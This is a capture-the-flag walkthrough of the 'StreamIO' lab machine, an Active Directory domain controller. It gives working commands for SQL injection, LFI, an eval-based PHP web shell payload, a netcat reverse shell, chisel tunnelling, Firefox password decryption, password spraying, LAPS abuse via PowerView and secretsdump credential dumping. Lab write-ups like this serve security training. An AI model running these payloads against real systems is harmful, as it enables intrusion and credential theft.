# StreamIO

# Enumeration

# Nmap

Nmap all ports:

$ sudo nmap -p- --min-rate=1000 -T4 

Nmap scan report for
Host is up (0.27s latency).
Not shown: 65515 filtered tcp ports (no-response)
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49697/tcp open  unknown
52483/tcp open  unknown

Nmap safe scripts on open ports:

$ sudo nmap -sC -sV -p 53,80,88,135,443,445,464,593,636,3268,3269,5985,9389,49667,49669,49670,49697,52483 -o nmap.txt

Nmap scan report for
Host is up (0.33s latency).

53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-05 08:14:15Z)
135/tcp   open  msrpc         Microsoft Windows RPC
443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2022-06-05T08:15:52+00:00; +6h59m35s from scanner time.
|_http-title: Not Found
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
52483/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-06-05T08:15:10
|_  start_date: N/A
|_clock-skew: mean: 6h59m35s, deviation: 0s, median: 6h59m34s

I see there is a couple of DNS entries in the output of port 443:

  • DNS:streamIO.htb
  • DNS:watch.streamIO.htb

We can add those to our /etc/hosts file:

...[SNIP]...   streamIO.htb watch.streamIO.htb


# StreamIO - Port 443

Browsing to https://streamio.htb the page loads an Online Movie Streaming service. There is a login page where it asks for username and password at https://streamio.htb/login.php.

We can use Burp to intercept a login attempt and save it to a file where we will use sqlmap to check for sql injections:

SQL injection found in username parameter:

$ sqlmap -r login.req --batch --force-ssl

POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N                                                        
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:                                                                  
Parameter: username (POST)                                                                                                                               
    Type: stacked queries                                                                                                                                
    Title: Microsoft SQL Server/Sybase stacked queries (comment)                                                                                         
    Payload: username=caue';WAITFOR DELAY '0:0:5'--&password=test                                                                                        

Since the sql injection is time-based it is taking a very long time to retrieve data.

Dumping the databases:

$ sqlmap -r login.req --batch --force-ssl --dbs

available databases [5]:
[*] model
[*] msdb
[*] streamio_backup
[*] tempdb

At this point we can start guessing some of the table names to make it quicker. For example, we can guess that there is a table called "users" in the STREAMIO database, as the name indicates it is the web app with the login page.

Dumping the table users from STREAMIO db we see that there is 33 users, it will take forever to finish. Anyway, here is the syntax:

$ sqlmap -r login.req --batch --force-ssl -D STREAMIO -T users --dump


| id | is_staff | password                         | username          |
| 31 | 1        | b779ba15cedfd22a023c4d8bcf5f2332 | yoshihide         | 


We get a lot of users and password hashes. Trying to crack them with Crackstation we end up with:

username = yoshihide
password = '66boysandgirls..'

We can use this credentials to login to https://streamio.htb/login.php. Logged in as yoshihide not much changed in the website, running gobuster we find the /admin endpoint.

$ gobuster dir -u https://streamio.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -x php -k


/admin                (Status: 301) [Size: 150] [--> https://streamio.htb/admin/]


# LFI to RCE

Browsing around at https://streamio.htb/admin/ we see that all the pages ends with a parameter:

We can fuzz it to see if we can find some more. Using wfuzz we specify the --hw 131 to hide all responses with 131 words, -b PHPSESSID to specify the admin cookie and -w the wordlist used.

$ wfuzz --hw 131 -b PHPSESSID=luoqop4jub9vubjbl5ngnblrb1 -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt 'https://streamio.htb/admin/?FUZZ='

* Wfuzz 3.1.0 - The Web Fuzzer                         *

Target: https://streamio.htb/admin/?FUZZ=
Total requests: 3132

ID           Response   Lines    Word       Chars       Payload                                                                                 

000000514:   200        49 L     137 W      1712 Ch     "debug"


After some testing, we find the debug parameter is vulnerable to LFI:

Using the PHP filter trick we can extract some of the web pages source code. The important parts here are in the source code of: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php


$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);


So we have the database username and password, but how to use it? After getting stuck here for a while I decided to fuzz the file name in the LFI to see if I can get more source code:

$ wfuzz --hh 1712 -b PHPSESSID=luoqop4jub9vubjbl5ngnblrb1 -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=FUZZ.php'

* Wfuzz 3.1.0 - The Web Fuzzer                         *

Target: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=FUZZ.php
Total requests: 3132

ID           Response   Lines    Word       Chars       Payload                                                                                 

000000908:   200        49 L     137 W      4916 Ch     "Index"                                                                                 
000000909:   200        49 L     137 W      4916 Ch     "index"                                                                                 
000001118:   200        49 L     137 W      5788 Ch     "master"

Cool, we have a master.php file as well! Doing a bit of code analyses in this file we finally see the path to get a shell. The file master.php is using the function eval like this:


if($_POST['include'] !== "index.php" ) 
echo(" ---- ERROR ---- ");

The code logic above simply says that if a user sends a POST request to master.php with data different than index.php in the parameter include it will pass to eval. It is a RCE vulnerability.

# RCE - Foothold

We can base64 encode our code to be passed to eval like this:

$ echo 'system($_REQUEST["cmd"]);' | base64

The above will include a new parameter that we can use to run system commands in the master.php file.

And then we can send system commands like this:

$ curl -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' -b 'PHPSESSID=luoqop4jub9vubjbl5ngnblrb1' --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pOwo=" 'https://streamio.htb/admin/?debug=master.php&cmd=dir' | grep '<input name="include" hidden>' -A 9999 |grep '</div>' -B 9999 | tail -n +3 | head -n -1

Volume in drive C has no label.
 Volume Serial Number is A381-2B63

 Directory of C:\inetpub\streamio.htb\admin

02/22/2022  03:49 AM    <DIR>          .
02/22/2022  03:49 AM    <DIR>          ..
02/22/2022  03:49 AM    <DIR>          css
02/22/2022  03:49 AM    <DIR>          fonts
02/22/2022  03:49 AM    <DIR>          images
06/03/2022  01:51 AM             2,401 index.php
02/22/2022  04:19 AM    <DIR>          js
06/03/2022  01:53 AM             3,055 master.php
02/23/2022  03:16 AM               878 movie_inc.php
02/23/2022  03:16 AM               936 staff_inc.php
02/23/2022  03:16 AM               879 user_inc.php
               5 File(s)          8,149 bytes
               6 Dir(s)   5,373,267,968 bytes free

We learn that we are in the directory C:\inetpub\streamio.htb\admin. To get a reverse shell here we can just upload netcat and then run netcat remotely to send us a reverse shell.

If the upload fails, the directory C:\Windows\System32\spool\drivers\color\nc.exe is always a good one to upload files as it is often whitelisted by the AV.

Using the same Curl command as above we can change the cmd= value to:

# Upload netcat

# Get a reverse shell

Receiving the reverse shell:

$ rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [] 49935
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\streamio.htb\admin> whoami

# Shell as yoshihide

# Enumerating the machine

Enumerating users:

PS C:\inetpub\streamio.htb\admin> net user
net user

User accounts for \\DC

Administrator            Guest                    JDgodd                   
krbtgt                   Martin                   nikk37                   
The command completed successfully.

We can see that Martin is member of Administrator group:

PS C:\inetpub\streamio.htb\admin> net user Martin /domain
net user Martin /domain
User name                    Martin
Full Name                    
Users comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2022 4:16:42 PM
Password expires             Never
Password changeable          5/27/2022 4:16:42 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   6/5/2022 12:35:13 AM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users

We might need to find a way to escalate from yoshihide to Martin or Administrator.

Enumerating the network - Ports listening:

PS C:\inetpub\streamio.htb\admin> netstat -ano | findstr LISTENING                                                                                                                         

  TCP                 LISTENING       4                                                                                 
  TCP                 LISTENING       616
  TCP                LISTENING       884
  TCP                LISTENING       616
  TCP                LISTENING       4
  TCP                LISTENING       4
  TCP                LISTENING       616
  TCP                LISTENING       884
  TCP                LISTENING       616
  TCP               LISTENING       3584
  TCP               LISTENING       4
  TCP               LISTENING       2592
  TCP              LISTENING       4
  TCP              LISTENING       472
  TCP              LISTENING       1076
  TCP              LISTENING       1456
  TCP              LISTENING       616
  TCP              LISTENING       616
  TCP              LISTENING       616
  TCP              LISTENING       608
  TCP              LISTENING       2776
  TCP              LISTENING       2748
  TCP              LISTENING       2776
  TCP              LISTENING       4

If we compare the ports here with the ones we got in the nmap port scan we will find some differences. One of them is the port 1433 (MSSQL) is listening internally only and we have the credentials for the database. We can use chisel to forward this port to our machine so we can use some pentest tools.

# Forward MSSQL port to our local machine

Download chisel for linux and windows:

# Chisel for linux
$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz

# Chisel for windows
$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz

Start chisel server in our machine:

$ ./chisel server -p 8000 --reverse

Upload chisel for windows to the target and forward port 1433:

PS C:\inetpub\streamio.htb\admin> wget -o chisel.exe

PS C:\inetpub\streamio.htb\admin> .\chisel.exe client R:1433:

Now we can connect to MSSQL using the credentials we found earlier:

$ sqsh -S -U db_admin -P 'B1@hx31234567890'

Enumerating the databases:

1> SELECT name, database_id, create_date                                                                                                                 
FROM sys.databases
2> go


Lets dum the users table of streamio_backup database:

1> use streamio_backup                                                                                                                                   
2> go                                                                                                                                                    
1> select * from users                                                                                                                                   
2> go

1 nikk37        389d14cb8e4e9b94b137deb1caf0612a                                                                                                                 
2 yoshihide     b779ba15cedfd22a023c4d8bcf5f2332                                                                                                                 
3 James         c660060492d9edcaa8332d89c99c9239                                                                                                                 
4 Theodore      925e5408ecb67aea449373d668b7359e                                                                                                                 
5 Samantha      083ffae904143c4796e464dac33c1f7d                                                                                                                 
6 Lauren        08344b85b329d7efd611b7a7743e8a09                                                                                                                 
7 William       d62be0dc82071bccc1322d64ec5b6c51                                                                                                                 
8 Sabrina       f87d3c0d6c8fd686aacc6627f1f493a5

The important credentials found here is nikk37 user as it is also a user in the machine. Using Crackstation we can crack the password:

Username: nikk37
Password: get_dem_girls2@yahoo.com

# Shell as Nikk37

Using nikk37 credentials we can connect to the target via WinRM:

$ evil-winrm -u nikk37 -p 'get_dem_girls2@yahoo.com' -i

PS C:\Users\nikk37\Documents> whoami

Get the user flag:

PS C:\Users\nikk37\desktop> type user.txt

Enumerating nikk37 files we find a Firefox database file key4.db and 2 interesintg json files, logins.json and logins-backup.json:

PS C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> dir

Directory: C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:40 AM                bookmarkbackups
d-----        2/22/2022   2:40 AM                browser-extension-data
d-----        2/22/2022   2:41 AM                crashes
d-----        2/22/2022   2:42 AM                datareporting
d-----        2/22/2022   2:40 AM                minidumps
d-----        2/22/2022   2:42 AM                saved-telemetry-pings
d-----        2/22/2022   2:40 AM                security_state
d-----        2/22/2022   2:42 AM                sessionstore-backups
d-----        2/22/2022   2:40 AM                storage
-a----        2/22/2022   2:40 AM             24 addons.json
-a----        2/22/2022   2:42 AM           5189 addonStartup.json.lz4
-a----        2/22/2022   2:42 AM            310 AlternateServices.txt
-a----        2/22/2022   2:41 AM         229376 cert9.db
-a----        2/22/2022   2:40 AM            208 compatibility.ini
-a----        2/22/2022   2:40 AM            939 containers.json
-a----        2/22/2022   2:40 AM         229376 content-prefs.sqlite
-a----        2/22/2022   2:40 AM          98304 cookies.sqlite
-a----        2/22/2022   2:40 AM           1081 extension-preferences.json
-a----        2/22/2022   2:40 AM          43726 extensions.json
-a----        2/22/2022   2:42 AM        5242880 favicons.sqlite
-a----        2/22/2022   2:41 AM         262144 formhistory.sqlite
-a----        2/22/2022   2:40 AM            778 handlers.json
-a----        2/22/2022   2:40 AM         294912 key4.db
-a----        2/22/2022   2:41 AM           1593 logins-backup.json
-a----        2/22/2022   2:41 AM           2081 logins.json
-a----        2/22/2022   2:42 AM              0 parent.lock
-a----        2/22/2022   2:42 AM          98304 permissions.sqlite
-a----        2/22/2022   2:40 AM            506 pkcs11.txt
-a----        2/22/2022   2:42 AM        5242880 places.sqlite
-a----        2/22/2022   2:42 AM           8040 prefs.js
-a----        2/22/2022   2:42 AM            180 search.json.mozlz4
-a----        2/22/2022   2:42 AM            288 sessionCheckpoints.json
-a----        2/22/2022   2:42 AM           1853 sessionstore.jsonlz4
-a----        2/22/2022   2:40 AM             18 shield-preference-experiments.json
-a----        2/22/2022   2:42 AM            611 SiteSecurityServiceState.txt
-a----        2/22/2022   2:42 AM           4096 storage.sqlite
-a----        2/22/2022   2:40 AM             50 times.json
-a----        2/22/2022   2:40 AM          98304 webappsstore.sqlite
-a----        2/22/2022   2:42 AM            141 xulstore.json

We use Evil-WinRM to download to our machine and then try to crack it:

# We need to use the full path!
PS C:\Users\nikk37> download C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db key4.db

Download logins.json

# We need to use the full path!
PS C:\Users\nikk37> download C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json logins.json

We can use Firepwd tool to crack the DB:

# We use -d to specify the directory where key4.db and logins.json are saved
$ python firepwd.py -d ../www/
decrypting login/password pairs

# SMB password spray

Now that we have many users and passwords we can use crackmapexec to do a password spray. I got all the users we found so far in a file called users.txt and the same for passwords and put it in password.txt:

$ cme smb streamio.htb -u users.txt -p passwords.txt --continue-on-success
SMB streamIO.htb 445 DC [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 
SMB streamIO.htb 445 DC [+] streamIO.htb\jdgodd:JDg0dd1s@d0p3cr3@t0r

Very important to use --continue-on-success flag, otherwise crackmapexec will stop when he finds a valid login.

Cool! We got one more credentials, for jdgodd user:

Username: jdgodd
Password: JDg0dd1s@d0p3cr3@t0r

# Bloodhound

We still don't know the path to martin or administrator. Lets run Bloodhound to map the AD for us and show some graphs! Run SharpHound in the target to extract the data:

*Evil-WinRM* PS C:\Users\nikk37> .\SharpHound.exe -c all

2022-06-06T03:46:48.9960341-07:00|INFORMATION|Status: 97 objects finished (+97 2.204545)/s -- Using 40 MB RAM
2022-06-06T03:46:48.9960341-07:00|INFORMATION|Enumeration finished in 00:00:44.2927695
2022-06-06T03:46:49.1835426-07:00|INFORMATION|SharpHound Enumeration Completed at 3:46 AM on 6/6/2022! Happy Graphing!

Download the loot to our machine:

*Evil-WinRM* PS C:\Users\nikk37> download C:\Users\nikk37\20220606034648_BloodHound.zip bloodhound-loot.zip

Start neo4j server:

$ sudo neo4j console

Start Bloodhound, login to neo4j and import the loot (simply drag-and-drop the .zip)!

$ ./BloodHound

Mark the user we owned:

I also marked martin as a High Value. From the Bloodhound output there is no direct path from nikk37 to admins accounts.

We have jdgodd password, so lets mark him as owned too. As we select the "Shortest Path to Owned Principals" we finally see tha path to Administrator:

The user jdgodd has WriteOwner privileges over "CORE STAFF" group. Whoever is a member of CORE STAFF group can read the LAPS! What is LAPS? The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.

# Privilege Escalation

First lets upload PowerView:

PS C:\Users\nikk37> upload PowerView.ps1
PS C:\Users\nikk37> Import-Module ./PowerView.ps1

Disclaimer: For some reason only the PowerView.ps1 script from the dev branch work.

Now we create the creds to use and set a Domain Object Owner to jdgodd:

PS C:\Users\nikk37> $SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force

PS C:\Users\nikk37> $Cred = New-Object System.Management.Automation.PSCredential('streamio.htb\jdgodd', $SecPassword)

PS C:\Users\nikk37> Set-DomainObjectOwner -Credential $Cred -Identity "CORE STAFF" -OwnerIdentity jdgodd

Give jdgodd all the rights and add him as a member off CORE STAFF:

PS C:\Users\nikk37> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "CORE STAFF" -PrincipalIdentity jdgodd -Rights All

PS C:\Users\nikk37> Add-DomainGroupMember -Identity "CORE STAFF" -Members "jdgodd" -Credential $Cred -Verbose

No errors so far, lets check if it works:

PS C:\Users\nikk37> Get-DomainGroupMember -Identity 'CORE STAFF'

GroupDomain             : streamIO.htb
GroupName               : CORE STAFF
GroupDistinguishedName  : CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
MemberDomain            : streamIO.htb
MemberName              : JDgodd
MemberDistinguishedName : CN=JDgodd,CN=Users,DC=streamIO,DC=htb
MemberObjectClass       : user
MemberSID               : S-1-5-21-1470860369-1569627196-4264678630-1104

Great! Lets dump LAPS:

PS C:\Users\nikk37> Get-DomainObject dc.streamio.htb -Credential $Cred -Properties "ms-mcs-AdmPwd",name

name ms-mcs-admpwd
---- -------------
DC   !vG(xZ{)5b8!4G

Alternatively we can use crackmapexec to dump LAPS:

$ crackmapexec ldap -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' -M laps

Now we can get a shell as Administrator using Evil-Winrm:

$ evil-winrm -u Administrator -p '!vG(xZ{)5b8!4G' -i

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

We are Administrator!

# Post Exploitation

Dumping the secrets

$ impacket-secretsdump streamio.htb/Administrator:'!vG(xZ{)5b8!4G'@

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation                                                                                                 
[*] Service RemoteRegistry is in stopped state                                                                                                           
[*] Starting service RemoteRegistry                                                                                                                      
[*] Target system bootKey: 0x4dbf07084a530cfa7ab417236bd4a647                                                                                            
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)                                                                                                     
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesnt have hash information.                                                 
[*] Dumping cached domain logon information (domain/username:hash)                                                                                       
[*] Dumping LSA Secrets                                                                                                                                  
[*] $MACHINE.ACC                                                                                                                                         
[*] DPAPI_SYSTEM                                                                                                                                         
[*] NL$KM                                                                                                                                                
 0000   A5 68 6C 6F 0F D6 72 8F  9E DE A2 27 47 D1 73 3A   .hlo..r....G.s:                                                                              
 0010   EA FB 23 4A 58 C9 04 91  95 A2 E7 3C 63 1A E8 B1   ..#JX......<c...                                                                              
 0020   DA D8 C8 95 DD 09 23 97  A5 5A 21 74 17 17 CC C6   ......#..Z!t....                                                                              
 0030   5E 1B F7 BE 34 99 DC 39  D1 72 7B 3E 19 B6 B2 3C   ^...4..9.r{>...<
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                            
[*] Using the DRSUAPI method to get NTDS.DIT secrets                                                                                                     
[*] Kerberos keys grabbed